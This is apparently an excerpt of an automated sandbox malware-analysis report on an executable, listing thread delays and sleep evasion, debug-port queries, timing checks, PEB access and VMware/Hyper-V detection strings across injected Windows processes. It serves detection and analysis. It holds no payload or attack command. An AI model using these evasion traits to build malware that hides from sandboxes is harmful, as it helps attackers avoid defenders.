Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5622	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7017	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3339	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6605	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 887	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 864	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Window / User API: threadDelayed 9842

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	API coverage: 1.6 %
Source: C:\Windows\SysWOW64\cmstp.exe	API coverage: 1.5 %

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe TID: 4816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5036	Thread sleep count: 5622 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3424	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7924	Thread sleep count: 3339 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7924	Thread sleep time: -6678000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7924	Thread sleep count: 6605 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7924	Thread sleep time: -13210000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7740	Thread sleep count: 130 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7740	Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7740	Thread sleep count: 9842 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7740	Thread sleep time: -19684000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003C894B memset,memset,memset,SHGetFolderPathW,memset,SHGetFolderPathW,CmFree,memset,FindFirstFileW,GetLastError,memset,memset,FindNextFileW,FindClose,		13_2_003C894B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CB3C4 memset,GetPrivateProfileStringW,FindFirstFileW,memset,FindNextFileW,		13_2_003CB3C4

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: 13_2_003CF80E GetSystemInfo,GetVersionExW,

13_2_003CF80E

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000A.00000003.3100045279.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4483326842.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: dacYzRiJuWECy.exe, 0000000B.00000002.2112957963.0000000006D10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000003.3094890002.000000000354F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000A.00000000.2048449810.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000000A.00000003.3094890002.000000000354F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000A.00000003.3100045279.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000000A.00000002.4483326842.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2074669355.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000003.3094890002.000000000354F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000A.00000003.3094890002.000000000354F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 0000000A.00000000.2048449810.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000A.00000000.2074669355.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000002.4478274172.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Code function: 9_2_00409AA0 rdtsc

9_2_00409AA0

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Code function: 9_2_0040ACE0 LdrLoadDll,

9_2_0040ACE0

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB0185 mov eax, dword ptr fs:[00000030h]	9_2_01AB0185
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF019F mov eax, dword ptr fs:[00000030h]	9_2_01AF019F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF019F mov eax, dword ptr fs:[00000030h]	9_2_01AF019F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF019F mov eax, dword ptr fs:[00000030h]	9_2_01AF019F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF019F mov eax, dword ptr fs:[00000030h]	9_2_01AF019F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6A197 mov eax, dword ptr fs:[00000030h]	9_2_01A6A197
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6A197 mov eax, dword ptr fs:[00000030h]	9_2_01A6A197
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6A197 mov eax, dword ptr fs:[00000030h]	9_2_01A6A197
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B14180 mov eax, dword ptr fs:[00000030h]	9_2_01B14180
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B14180 mov eax, dword ptr fs:[00000030h]	9_2_01B14180
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2C188 mov eax, dword ptr fs:[00000030h]	9_2_01B2C188
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B2C188 mov eax, dword ptr fs:[00000030h]	9_2_01B2C188
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B461E5 mov eax, dword ptr fs:[00000030h]	9_2_01B461E5
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA01F8 mov eax, dword ptr fs:[00000030h]	9_2_01AA01F8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B361C3 mov eax, dword ptr fs:[00000030h]	9_2_01B361C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B361C3 mov eax, dword ptr fs:[00000030h]	9_2_01B361C3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01AEE1D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01AEE1D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE1D0 mov ecx, dword ptr fs:[00000030h]	9_2_01AEE1D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01AEE1D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AEE1D0 mov eax, dword ptr fs:[00000030h]	9_2_01AEE1D0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA0124 mov eax, dword ptr fs:[00000030h]	9_2_01AA0124
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B30115 mov eax, dword ptr fs:[00000030h]	9_2_01B30115
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1A118 mov ecx, dword ptr fs:[00000030h]	9_2_01B1A118
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1A118 mov eax, dword ptr fs:[00000030h]	9_2_01B1A118
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1A118 mov eax, dword ptr fs:[00000030h]	9_2_01B1A118
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1A118 mov eax, dword ptr fs:[00000030h]	9_2_01B1A118
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov eax, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov eax, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov eax, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov eax, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov eax, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov eax, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B1E10E mov ecx, dword ptr fs:[00000030h]	9_2_01B1E10E
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44164 mov eax, dword ptr fs:[00000030h]	9_2_01B44164
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B44164 mov eax, dword ptr fs:[00000030h]	9_2_01B44164
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B08158 mov eax, dword ptr fs:[00000030h]	9_2_01B08158
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6C156 mov eax, dword ptr fs:[00000030h]	9_2_01A6C156
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A76154 mov eax, dword ptr fs:[00000030h]	9_2_01A76154
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A76154 mov eax, dword ptr fs:[00000030h]	9_2_01A76154
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B04144 mov eax, dword ptr fs:[00000030h]	9_2_01B04144
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B04144 mov eax, dword ptr fs:[00000030h]	9_2_01B04144
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B04144 mov ecx, dword ptr fs:[00000030h]	9_2_01B04144
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B04144 mov eax, dword ptr fs:[00000030h]	9_2_01B04144
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B04144 mov eax, dword ptr fs:[00000030h]	9_2_01B04144
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A680A0 mov eax, dword ptr fs:[00000030h]	9_2_01A680A0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B360B8 mov eax, dword ptr fs:[00000030h]	9_2_01B360B8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B360B8 mov ecx, dword ptr fs:[00000030h]	9_2_01B360B8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B080A8 mov eax, dword ptr fs:[00000030h]	9_2_01B080A8
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7208A mov eax, dword ptr fs:[00000030h]	9_2_01A7208A
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_01A6A0E3
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A780E9 mov eax, dword ptr fs:[00000030h]	9_2_01A780E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF60E0 mov eax, dword ptr fs:[00000030h]	9_2_01AF60E0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6C0F0 mov eax, dword ptr fs:[00000030h]	9_2_01A6C0F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AB20F0 mov ecx, dword ptr fs:[00000030h]	9_2_01AB20F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF20DE mov eax, dword ptr fs:[00000030h]	9_2_01AF20DE
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B06030 mov eax, dword ptr fs:[00000030h]	9_2_01B06030
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6A020 mov eax, dword ptr fs:[00000030h]	9_2_01A6A020
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6C020 mov eax, dword ptr fs:[00000030h]	9_2_01A6C020
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF4000 mov ecx, dword ptr fs:[00000030h]	9_2_01AF4000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B12000 mov eax, dword ptr fs:[00000030h]	9_2_01B12000
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E016 mov eax, dword ptr fs:[00000030h]	9_2_01A8E016
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E016 mov eax, dword ptr fs:[00000030h]	9_2_01A8E016
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E016 mov eax, dword ptr fs:[00000030h]	9_2_01A8E016
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E016 mov eax, dword ptr fs:[00000030h]	9_2_01A8E016
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9C073 mov eax, dword ptr fs:[00000030h]	9_2_01A9C073
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A72050 mov eax, dword ptr fs:[00000030h]	9_2_01A72050
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AF6050 mov eax, dword ptr fs:[00000030h]	9_2_01AF6050
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9438F mov eax, dword ptr fs:[00000030h]	9_2_01A9438F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A9438F mov eax, dword ptr fs:[00000030h]	9_2_01A9438F
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6E388 mov eax, dword ptr fs:[00000030h]	9_2_01A6E388
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6E388 mov eax, dword ptr fs:[00000030h]	9_2_01A6E388
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A6E388 mov eax, dword ptr fs:[00000030h]	9_2_01A6E388
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A68397 mov eax, dword ptr fs:[00000030h]	9_2_01A68397
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A68397 mov eax, dword ptr fs:[00000030h]	9_2_01A68397
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A68397 mov eax, dword ptr fs:[00000030h]	9_2_01A68397
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A803E9 mov eax, dword ptr fs:[00000030h]	9_2_01A803E9
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01AA63FF mov eax, dword ptr fs:[00000030h]	9_2_01AA63FF
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E3F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E3F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A8E3F0 mov eax, dword ptr fs:[00000030h]	9_2_01A8E3F0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B143D4 mov eax, dword ptr fs:[00000030h]	9_2_01B143D4
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01B143D4 mov eax, dword ptr fs:[00000030h]	9_2_01B143D4
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A3C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A3C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A3C0
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Code function: 9_2_01A7A3C0 mov eax, dword ptr fs:[00000030h]	9_2_01A7A3C0
